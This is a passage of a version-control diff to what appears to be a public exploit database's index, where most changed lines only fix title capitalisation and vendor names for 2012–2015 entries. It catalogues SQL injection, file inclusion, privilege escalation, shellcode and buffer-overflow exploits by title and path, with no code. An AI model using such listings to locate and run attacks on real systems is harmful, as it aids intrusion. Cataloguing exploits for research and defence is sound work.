Parameter SQL Injection",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0 +38101,platforms/php/webapps/38101.txt,"WordPress Zingiri Forums Plugin - 'language' Parameter Local File Inclusion",2012-12-30,Amirh03in,php,webapps,0 +38102,platforms/php/webapps/38102.txt,"WordPress Nest Theme - 'codigo' Parameter SQL Injection",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0 38103,platforms/php/webapps/38103.txt,"Sourcefabric Newscoop - 'f_email' Parameter SQL Injection",2012-12-04,AkaStep,php,webapps,0 -38136,platforms/osx/local/38136.txt,"OS X Install.framework - suid root Runner Binary Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 -38137,platforms/osx/local/38137.txt,"OS X Install.framework - Arbitrary mkdir / unlink and chown to Admin Group",2015-09-10,"Google Security Research",osx,local,0 +38136,platforms/osx/local/38136.txt,"Apple Mac OS X Install.Framework - SUID root Runner Binary Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 +38137,platforms/osx/local/38137.txt,"Apple Mac OS X Install.Framework - Arbitrary mkdir / unlink and chown to Admin Group",2015-09-10,"Google Security Research",osx,local,0 38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 and exit Shellcode (Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0 38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0 38096,platforms/linux/remote/38096.rb,"Endian Firewall Proxy - Password Change Command Injection",2015-09-07,Metasploit,linux,remote,10443 38097,platforms/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80 38098,platforms/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,hyp3rlinx,jsp,webapps,8081 -38105,platforms/php/webapps/38105.txt,"Wordpress White-Label Framework 2.0.6 Theme - Cross-Site Scripting",2015-09-08,Outlasted,php,webapps,80 -38108,platforms/windows/dos/38108.txt,"Advantech WebAccess 8.0 / 3.4.3 ActiveX - Multiple Vulnerabilities",2015-09-08,"Praveen Darshanam",windows,dos,0 +38105,platforms/php/webapps/38105.txt,"WordPress White-Label Framework 2.0.6 Theme - Cross-Site Scripting",2015-09-08,Outlasted,php,webapps,80 +38108,platforms/windows/dos/38108.txt,"Advantech Webaccess 8.0 / 3.4.3 ActiveX - Multiple Vulnerabilities",2015-09-08,"Praveen Darshanam",windows,dos,0 38109,platforms/linux/remote/38109.pl,"Oracle MySQL / MariaDB - Insecure Salt Generation Security Bypass",2012-12-06,kingcope,linux,remote,0 38110,platforms/php/webapps/38110.txt,"DirectAdmin Web Control Panel 1.483 - Multiple Vulnerabilities",2015-09-08,"Ashiyane Digital Security Team",php,webapps,0 -38111,platforms/php/webapps/38111.txt,"Wordpress Simple Gmail Login Plugin - Stack Trace Information Disclosure",2012-12-07,"Aditya Balapure",php,webapps,0 +38111,platforms/php/webapps/38111.txt,"WordPress Simple Gmail Login Plugin - Stack Trace Information Disclosure",2012-12-07,"Aditya Balapure",php,webapps,0 38112,platforms/php/webapps/38112.txt,"FOOT Gestion - 'id' Parameter SQL Injection",2012-12-07,"Emmanuel Farcy",php,webapps,0 38113,platforms/php/webapps/38113.php,"vBulletin ajaxReg Module - SQL Injection",2012-12-08,"Cold Zero",php,webapps,0 38114,platforms/cgi/webapps/38114.html,"Smartphone Pentest Framework - Multiple Remote Command Execution Vulnerabilities",2012-12-10,"High-Tech Bridge",cgi,webapps,0 @@ -34421,23 +34424,23 @@ id,file,description,date,author,platform,type,port 38116,platforms/lin_x86/shellcode/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",lin_x86,shellcode,0 38118,platforms/xml/webapps/38118.txt,"Qlikview 11.20 SR11 - Blind XXE Injection",2015-09-09,"Alex Haynes",xml,webapps,0 38119,platforms/php/webapps/38119.html,"Auto-Exchanger 5.1.0 - Cross-Site Request Forgery",2015-09-09,"Aryan Bayaninejad",php,webapps,0 -38120,platforms/php/dos/38120.txt,"PHP - SplDoublyLinkedList unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 +38120,platforms/php/dos/38120.txt,"PHP - SplDoublyLinkedList Unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 38121,platforms/php/dos/38121.txt,"PHP GMP unserialize() - Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 -38122,platforms/php/dos/38122.txt,"PHP - SplObjectStorage unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 +38122,platforms/php/dos/38122.txt,"PHP - SplObjectStorage Unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 38123,platforms/php/dos/38123.txt,"PHP Session Deserializer - Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 38124,platforms/android/remote/38124.py,"Android Stagefright - Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0 -38125,platforms/php/dos/38125.txt,"PHP - unserialize() Use-After-Free Vulnerabilities",2015-09-09,"Taoguang Chen",php,dos,0 +38125,platforms/php/dos/38125.txt,"PHP - Unserialize() Use-After-Free Vulnerabilities",2015-09-09,"Taoguang Chen",php,dos,0 38126,platforms/osx/shellcode/38126.c,"OS-X/x86-64 - 4444/TPC port bind Nullfree Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0 -38127,platforms/php/webapps/38127.php,"PHP - cgimode fpm writeprocmemfile bypass disable function demo",2015-09-10,ylbhz,php,webapps,0 +38127,platforms/php/webapps/38127.php,"PHP - cgimode fpm writeprocmemfile Bypass disable function demo",2015-09-10,ylbhz,php,webapps,0 38128,platforms/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",cgi,webapps,5000 38129,platforms/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps,0 38130,platforms/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,"Cartel Informatique Security Research Labs",java,webapps,0 38131,platforms/php/webapps/38131.txt,"PHP Address Book - 'group' Parameter Cross-Site Scripting",2012-12-13,"Kenneth F. Belva",php,webapps,0 38132,platforms/linux/dos/38132.py,"Linux Kernel 3.3.5 - Btrfs CRC32C feature Infinite Loop Local Denial of Service",2012-12-13,"Pascal Junod",linux,dos,0 -38133,platforms/php/webapps/38133.txt,"RokBox Plugin for Wordpress - /wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf abouttext Parameter Cross-Site Scripting",2012-12-17,MustLive,php,webapps,0 -38134,platforms/php/webapps/38134.txt,"Joomla! ZT Autolinks Component - 'controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 -38135,platforms/php/webapps/38135.txt,"Joomla! Bit Component - 'controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 -38138,platforms/osx/local/38138.txt,"OSX - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 +38133,platforms/php/webapps/38133.txt,"RokBox Plugin for WordPress - /wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf abouttext Parameter Cross-Site Scripting",2012-12-17,MustLive,php,webapps,0 +38134,platforms/php/webapps/38134.txt,"Joomla! ZT Autolinks Component - 'Controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 +38135,platforms/php/webapps/38135.txt,"Joomla! Bit Component - 'Controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 +38138,platforms/osx/local/38138.txt,"Apple Mac OS X - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 38139,platforms/php/webapps/38139.txt,"MyBB Transactions Plugin - 'transaction' Parameter SQL Injection",2012-12-18,limb0,php,webapps,0 38140,platforms/php/webapps/38140.php,"VoipNow Service Provider Edition - Arbitrary Command Execution",2012-12-21,i-Hmx,php,webapps,0 38141,platforms/php/webapps/38141.txt,"Hero Framework - search q Parameter Cross-Site Scripting",2012-12-24,"Stefan Schurtz",php,webapps,0 @@ -34451,41 +34454,41 @@ id,file,description,date,author,platform,type,port 38203,platforms/linux/remote/38203.txt,"Schmid Watson Management Console - Directory Traversal",2013-01-09,"Dhruv Shah",linux,remote,0 38204,platforms/php/webapps/38204.txt,"Prizm Content Connect - Arbitrary File Upload",2013-01-09,"Include Security Research",php,webapps,0 38150,platforms/lin_x86-64/shellcode/38150.txt,"Linux/x86-64 - /bin/sh Shellcode",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode,0 -38151,platforms/windows/remote/38151.py,"Windows Media Center - Command Execution (MS15-100)",2015-09-11,R-73eN,windows,remote,0 +38151,platforms/windows/remote/38151.py,"Microsoft Windows Media Center - Command Execution (MS15-100)",2015-09-11,R-73eN,windows,remote,0 38152,platforms/php/webapps/38152.txt,"MotoCMS - admin/data/users.xml Access Restriction Weakness Information Disclosure",2013-01-08,AkaStep,php,webapps,0 38153,platforms/php/webapps/38153.txt,"cPanel WebHost Manager (WHM) - /webmail/x3/mail/clientconf.html acct Parameter Cross-Site Scripting",2012-12-27,"Christy Philip Mathew",php,webapps,0 38154,platforms/php/webapps/38154.txt,"cPanel - detailbw.html Multiple Parameter Cross-Site Scripting",2012-12-27,"Christy Philip Mathew",php,webapps,0 38155,platforms/php/webapps/38155.txt,"WHM - 'filtername' Parameter Cross-Site Scripting",2012-12-27,"Rafay Baloch",php,webapps,0 38156,platforms/php/webapps/38156.txt,"cPanel - 'dir' Parameter Cross-Site Scripting",2012-12-26,"Rafay Baloch",php,webapps,0 -38157,platforms/php/webapps/38157.txt,"Wordpress Xerte Online Plugin - 'save.php' Arbitrary File Upload",2013-01-02,"Sammy FORGIT",php,webapps,0 -38158,platforms/php/webapps/38158.txt,"Wordpress Shopping Cart Plugin for Wordpress - /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 -38159,platforms/php/webapps/38159.txt,"Wordpress Shopping Cart Plugin for Wordpress - /wp-content/plugins/levelfourstorefront/scripts/administration/backup.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 -38160,platforms/php/webapps/38160.txt,"Wordpress Shopping Cart Plugin for Wordpress - /wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 +38157,platforms/php/webapps/38157.txt,"WordPress Xerte Online Plugin - 'save.php' Arbitrary File Upload",2013-01-02,"Sammy FORGIT",php,webapps,0 +38158,platforms/php/webapps/38158.txt,"WordPress Shopping Cart Plugin for WordPress - /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 +38159,platforms/php/webapps/38159.txt,"WordPress Shopping Cart Plugin for WordPress - /wp-content/plugins/levelfourstorefront/scripts/administration/backup.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 +38160,platforms/php/webapps/38160.txt,"WordPress Shopping Cart Plugin for WordPress - /wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 38161,platforms/php/webapps/38161.txt,"osTicket - l.php url Parameter Arbitrary Site Redirect",2013-01-02,AkaStep,php,webapps,0 38162,platforms/php/webapps/38162.txt,"osTicket - tickets.php status Parameter Cross-Site Scripting",2013-01-02,AkaStep,php,webapps,0 -38163,platforms/php/webapps/38163.txt,"Wordpress Uploader Plugin - Arbitrary File Upload",2013-01-03,"Sammy FORGIT",php,webapps,0 +38163,platforms/php/webapps/38163.txt,"WordPress Uploader Plugin - Arbitrary File Upload",2013-01-03,"Sammy FORGIT",php,webapps,0 38164,platforms/hardware/remote/38164.py,"Belkin Wireless Router Default - WPS PIN Security",2013-01-03,ZhaoChunsheng,hardware,remote,0 38165,platforms/windows/dos/38165.txt,"IKEView.exe Fox Beta 1 - Stack Buffer Overflow",2015-09-13,hyp3rlinx,windows,dos,0 38166,platforms/php/webapps/38166.txt,"WHMCS 5.0 - Insecure Cookie Authentication Bypass",2012-12-31,Agd_Scorp,php,webapps,0 -38167,platforms/php/webapps/38167.php,"Wordpress Multiple WPScientist Themes - Arbitrary File Upload",2013-01-04,JingoBD,php,webapps,0 +38167,platforms/php/webapps/38167.php,"WordPress Multiple WPScientist Themes - Arbitrary File Upload",2013-01-04,JingoBD,php,webapps,0 38168,platforms/php/webapps/38168.txt,"TomatoCart - 'json.php' Security Bypass",2013-01-04,"Aung Khant",php,webapps,0 38169,platforms/php/webapps/38169.txt,"Havalite CMS - 'comment' Parameter HTML Injection",2013-01-06,"Henri Salo",php,webapps,0 38170,platforms/android/remote/38170.txt,"Facebook for Android - 'LoginActivity' Information Disclosure",2013-01-07,"Takeshi Terada",android,remote,0 38171,platforms/php/webapps/38171.txt,"Joomla! Incapsula Component - Multiple Cross-Site Scripting Vulnerabilities",2013-01-08,"Gjoko Krstic",php,webapps,0 -38178,platforms/php/webapps/38178.txt,"Wordpress NextGEN Gallery Plugin - 'test-head' Parameter Cross-Site Scripting",2013-01-08,Am!r,php,webapps,0 +38178,platforms/php/webapps/38178.txt,"WordPress NextGEN Gallery Plugin - 'test-head' Parameter Cross-Site Scripting",2013-01-08,Am!r,php,webapps,0 38173,platforms/multiple/webapps/38173.txt,"ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Query Execution",2015-09-14,xistence,multiple,webapps,0 38174,platforms/multiple/webapps/38174.txt,"ManageEngine OpManager 11.5 - Multiple Vulnerabilities",2015-09-14,xistence,multiple,webapps,0 38179,platforms/multiple/remote/38179.txt,"Dell OpenManage Server Administrator - Cross-Site Scripting",2013-01-09,"Tenable NS",multiple,remote,0 -38180,platforms/php/webapps/38180.txt,"TinyBrowser - /tiny_mce/plugins/tinybrowser/edit.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0 +38180,platforms/php/webapps/38180.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0 38176,platforms/php/webapps/38176.txt,"EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",php,webapps,0 38177,platforms/windows/dos/38177.txt,"IKEView.exe R60 - Stack Buffer Overflow",2015-09-14,hyp3rlinx,windows,dos,0 -38181,platforms/php/webapps/38181.txt,"TinyBrowser - /tiny_mce/plugins/tinybrowser/upload.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0 -38182,platforms/php/webapps/38182.txt,"TinyBrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0 -38183,platforms/php/webapps/38183.txt,"TinyBrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0 -38184,platforms/php/webapps/38184.txt,"TinyBrowser - /tiny_mce/plugins/tinybrowser/edit.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0 +38181,platforms/php/webapps/38181.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/upload.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0 +38182,platforms/php/webapps/38182.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0 +38183,platforms/php/webapps/38183.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0 +38184,platforms/php/webapps/38184.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0 38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - SEH Overwrite Buffer Overflow",2015-09-15,Un_N0n,windows,local,0 38186,platforms/hardware/remote/38186.txt,"TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials",2015-09-15,LiquidWorm,hardware,remote,0 -38187,platforms/php/webapps/38187.txt,"Wordpress CP Reservation Calendar Plugin 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",php,webapps,80 +38187,platforms/php/webapps/38187.txt,"WordPress CP Reservation Calendar Plugin 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",php,webapps,80 38188,platforms/jsp/webapps/38188.txt,"Openfire 3.10.2 - Unrestricted File Upload",2015-09-15,hyp3rlinx,jsp,webapps,80 38189,platforms/jsp/webapps/38189.txt,"Openfire 3.10.2 - Remote File Inclusion",2015-09-15,hyp3rlinx,jsp,webapps,0 38190,platforms/jsp/webapps/38190.txt,"Openfire 3.10.2 - Privilege Escalation",2015-09-15,hyp3rlinx,jsp,webapps,80 @@ -34495,16 +34498,16 @@ id,file,description,date,author,platform,type,port 38195,platforms/windows/remote/38195.rb,"Microsoft Windows Media Center - MCL (MS15-100)",2015-09-15,Metasploit,windows,remote,0 38196,platforms/php/remote/38196.rb,"CMS Bolt - Arbitrary File Upload",2015-09-15,Metasploit,php,remote,80 38197,platforms/php/webapps/38197.txt,"Silver Peak VXOA < 6.2.11 - Multiple Vulnerabilities",2015-09-15,Security-Assessment.com,php,webapps,80 -38198,platforms/windows/local/38198.txt,"Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 -38199,platforms/windows/local/38199.txt,"Windows - NtUserGetClipboardAccessToken Token Leak",2015-09-15,"Google Security Research",windows,local,0 -38200,platforms/windows/local/38200.txt,"Windows Task Scheduler - DeleteExpiredTaskAfter File Deletion Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 -38201,platforms/windows/local/38201.txt,"Windows - CreateObjectTask TileUserBroker Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 -38202,platforms/windows/local/38202.txt,"Windows - CreateObjectTask SettingsSyncDiagnostics Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 +38198,platforms/windows/local/38198.txt,"Microsoft Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 +38199,platforms/windows/local/38199.txt,"Microsoft Windows - NtUserGetClipboardAccessToken Token Leak",2015-09-15,"Google Security Research",windows,local,0 +38200,platforms/windows/local/38200.txt,"Microsoft Windows Task Scheduler - DeleteExpiredTaskAfter File Deletion Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 +38201,platforms/windows/local/38201.txt,"Microsoft Windows - CreateObjectTask TileUserBroker Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 +38202,platforms/windows/local/38202.txt,"Microsoft Windows - CreateObjectTask SettingsSyncDiagnostics Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 38205,platforms/multiple/dos/38205.py,"BT Home Hub - 'uuid' field Buffer Overflow",2013-01-08,"Zachary Cutlip",multiple,dos,0 38206,platforms/windows/remote/38206.html,"Samsung Kies - Remote Buffer Overflow",2013-01-09,"High-Tech Bridge",windows,remote,0 38207,platforms/php/webapps/38207.txt,"Quick.Cms/Quick.Cart - Cross-Site Scripting",2013-01-09,"High-Tech Bridge",php,webapps,0 38208,platforms/multiple/dos/38208.py,"Colloquy - Remote Denial of Service",2013-01-09,Aph3x,multiple,dos,0 -38209,platforms/php/webapps/38209.txt,"Wordpress Gallery Plugin - 'filename_1' Parameter Arbitrary File Access",2013-01-10,Beni_Vanda,php,webapps,0 +38209,platforms/php/webapps/38209.txt,"WordPress Gallery Plugin - 'filename_1' Parameter Arbitrary File Access",2013-01-10,Beni_Vanda,php,webapps,0 38210,platforms/php/webapps/38210.txt,"Kirby CMS 2.1.0 - Cross-Site Request Forgery Content Upload and PHP Script Execution",2015-09-22,"Dawid Golunski",php,webapps,0 38256,platforms/php/webapps/38256.py,"h5ai < 0.25.0 - Unrestricted File Upload",2015-09-22,rTheory,php,webapps,80 38258,platforms/ios/webapps/38258.txt,"Air Drive Plus 2.4 - Arbitrary File Upload",2015-09-22,Vulnerability-Lab,ios,webapps,8000 @@ -34513,7 +34516,7 @@ id,file,description,date,author,platform,type,port 38215,platforms/windows/dos/38215.txt,"Microsoft Office 2007 - BIFFRecord Length Use-After-Free",2015-09-16,"Google Security Research",windows,dos,0 38216,platforms/windows/dos/38216.txt,"Microsoft Office 2007 - OLESSDirectyEntry.CreateTime Type Confusion",2015-09-16,"Google Security Research",windows,dos,0 38217,platforms/windows/dos/38217.txt,"Microsoft Office 2007 - OGL.dll ValidateBitmapInfo Bounds Check Failure (MS15-097)",2015-09-16,"Google Security Research",windows,dos,0 -38218,platforms/windows/local/38218.py,"IKEView.exe R60 - .elg Local SEH Exploit",2015-09-17,cor3sm4sh3r,windows,local,0 +38218,platforms/windows/local/38218.py,"IKEView.exe R60 - '.elg' Local SEH Exploit",2015-09-17,cor3sm4sh3r,windows,local,0 38219,platforms/windows/local/38219.py,"ZTE PC UI USB Modem Software - Buffer Overflow",2015-09-17,R-73eN,windows,local,0 38220,platforms/windows/local/38220.py,"IKEView R60 - Buffer Overflow Local Exploit (SEH)",2015-09-17,VIKRAMADITYA,windows,local,0 38221,platforms/java/remote/38221.rb,"ManageEngine OpManager - Remote Code Execution",2015-09-17,Metasploit,java,remote,0 @@ -34532,7 +34535,7 @@ id,file,description,date,author,platform,type,port 38234,platforms/php/webapps/38234.txt,"DigiLIBE - Execution-After-Redirect Information Disclosure",2013-01-22,"Robert Gilbert",php,webapps,0 38235,platforms/jsp/webapps/38235.txt,"Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities",2013-01-22,"Christy Philip Mathew",jsp,webapps,0 38236,platforms/php/webapps/38236.txt,"gpEasy CMS - 'section' Parameter Cross-Site Scripting",2013-01-23,"High-Tech Bridge SA",php,webapps,0 -38237,platforms/php/webapps/38237.txt,"Wordpress Chocolate WP Theme - Multiple Security Vulnerabilities",2013-01-23,"Eugene Dokukin",php,webapps,0 +38237,platforms/php/webapps/38237.txt,"WordPress Chocolate WP Theme - Multiple Security Vulnerabilities",2013-01-23,"Eugene Dokukin",php,webapps,0 38238,platforms/php/webapps/38238.txt,"PHPWeby Free Directory Script - 'contact.php' Multiple SQL Injection",2013-01-25,AkaStep,php,webapps,0 38239,platforms/lin_x86-64/shellcode/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,lin_x86-64,shellcode,0 38240,platforms/windows/dos/38240.py,"Wireshark 1.12.7 - Division by Zero Crash (PoC)",2015-09-18,spyk,windows,dos,0 @@ -34545,81 +34548,81 @@ id,file,description,date,author,platform,type,port 38248,platforms/multiple/remote/38248.txt,"Multiple Hunt CCTV - Information Disclosure",2013-01-29,"Alejandro Ramos",multiple,remote,0 38249,platforms/multiple/dos/38249.txt,"MiniUPnP - Multiple Denial of Service Vulnerabilities",2012-01-28,Rapid7,multiple,dos,0 38250,platforms/multiple/remote/38250.html,"Novell Groupwise Client 8.0 - Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",multiple,remote,0 -38251,platforms/php/webapps/38251.txt,"Wordpress WP-Table Reloaded Plugin - 'id' Parameter Cross-Site Scripting",2013-01-24,hiphop,php,webapps,0 +38251,platforms/php/webapps/38251.txt,"WordPress WP-Table Reloaded Plugin - 'id' Parameter Cross-Site Scripting",2013-01-24,hiphop,php,webapps,0 38252,platforms/windows/remote/38252.py,"Konica Minolta FTP Utility 1.0 - Remote Command Execution",2015-09-20,R-73eN,windows,remote,21 -38254,platforms/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 - Post-Authenticated CWD Command SEH Overflow",2015-09-21,Metasploit,windows,remote,21 +38254,platforms/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 - Post-Authentication CWD Command SEH Overflow",2015-09-21,Metasploit,windows,remote,21 38255,platforms/php/webapps/38255.txt,"Kirby CMS 2.1.0 - Authentication Bypass",2015-09-22,"Dawid Golunski",php,webapps,80 38259,platforms/windows/dos/38259.py,"MASM32 11R - Crash (PoC)",2015-09-22,VIKRAMADITYA,windows,dos,0 38260,platforms/windows/remote/38260.php,"Konica Minolta FTP Utility 1.0 - Directory Traversal",2015-09-22,shinnai,windows,remote,21 -38261,platforms/xml/webapps/38261.txt,"SAP Netweaver < 7.01 - XML External Entity Injection",2015-09-22,"Lukasz Miedzinski",xml,webapps,0 -38262,platforms/osx/dos/38262.txt,"OS X Regex Engine (TRE) - (Integer Signedness and Overflow) Multiple Vulnerabilities",2015-09-22,"Google Security Research",osx,dos,0 -38263,platforms/osx/dos/38263.txt,"OS X Regex Engine (TRE) - Stack Buffer Overflow",2015-09-22,"Google Security Research",osx,dos,0 +38261,platforms/xml/webapps/38261.txt,"SAP NetWeaver < 7.01 - XML External Entity Injection",2015-09-22,"Lukasz Miedzinski",xml,webapps,0 +38262,platforms/osx/dos/38262.txt,"Apple Mac OS X Regex Engine (TRE) - (Integer Signedness and Overflow) Multiple Vulnerabilities",2015-09-22,"Google Security Research",osx,dos,0 +38263,platforms/osx/dos/38263.txt,"Apple Mac OS X Regex Engine (TRE) - Stack Buffer Overflow",2015-09-22,"Google Security Research",osx,dos,0 38264,platforms/osx/dos/38264.txt,"Apple qlmanage - SceneKit::daeElement::setElementName Heap Overflow",2015-09-22,"Google Security Research",osx,dos,0 -38265,platforms/win_x86/dos/38265.txt,"Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38266,platforms/win_x86/dos/38266.txt,"Windows Kernel - DeferWindowPos Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38267,platforms/win_x86/dos/38267.txt,"Windows Kernel - UserCommitDesktopMemory Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38268,platforms/win_x86/dos/38268.txt,"Windows Kernel - Pool Buffer Overflow Drawing Caption Bar (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38269,platforms/win_x86/dos/38269.txt,"Windows Kernel - HmgAllocateObjectAttr Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38270,platforms/win_x86/dos/38270.txt,"Windows Kernel - win32k!vSolidFillRect Buffer Overflow (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38271,platforms/win_x86/dos/38271.txt,"Windows Kernel - SURFOBJ NULL Pointer Dereference (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38272,platforms/windows/dos/38272.txt,"Windows Kernel - Brush Object Use-After-Free (MS15-061)",2015-09-22,"Google Security Research",windows,dos,0 -38273,platforms/win_x86/dos/38273.txt,"Windows Kernel - WindowStation Use-After-Free (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38274,platforms/win_x86/dos/38274.txt,"Windows Kernel - NULL Pointer Dereference with Window Station and Clipboard (MS15-061)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38275,platforms/win_x86/dos/38275.txt,"Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38276,platforms/win_x86/dos/38276.txt,"Windows Kernel - FlashWindowEx​ Memory Corruption (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38277,platforms/win_x86/dos/38277.txt,"Windows Kernel - bGetRealizedBrush Use-After-Free (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38278,platforms/win_x86/dos/38278.txt,"Windows Kernel - Use-After-Free with Cursor Object (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38279,platforms/win_x86/dos/38279.txt,"Windows Kernel - Use-After-Free with Printer Device Contexts (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38280,platforms/win_x86/dos/38280.txt,"Windows Kernel - NtGdiStretchBlt Pool Buffer Overflows (MS15-097)",2015-09-22,"Nils Sommer",win_x86,dos,0 -38281,platforms/windows/dos/38281.txt,"Kaspersky Antivirus - VB6 Parsing Integer Overflow",2015-09-22,"Google Security Research",windows,dos,0 -38282,platforms/windows/dos/38282.txt,"Kaspersky Antivirus - ExeCryptor Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0 -38283,platforms/windows/dos/38283.txt,"Kaspersky Antivirus - PE Unpacking Integer Overflow",2015-09-22,"Google Security Research",windows,dos,0 -38284,platforms/windows/dos/38284.txt,"Kaspersky Antivirus - .DEX File Format Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0 -38285,platforms/windows/dos/38285.txt,"Kaspersky Antivirus - CHM Parsing Stack Buffer Overflow",2015-09-22,"Google Security Research",windows,dos,0 -38286,platforms/windows/dos/38286.txt,"Kaspersky Antivirus - UPX Parsing Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0 -38287,platforms/windows/local/38287.txt,"Kaspersky Antivirus - ThinApp Parser Stack Buffer Overflow",2015-09-22,"Google Security Research",windows,local,0 -38288,platforms/windows/dos/38288.txt,"Kaspersky Antivirus - Yoda's Protector Unpacking Memory Corruption",2015-09-22,"Google Security Research",windows,dos,0 +38265,platforms/win_x86/dos/38265.txt,"Microsoft Windows - Kernel Bitmap Handling Use-After-Free (MS15-061) (2)",2015-09-22,"Nils Sommer",win_x86,dos,0 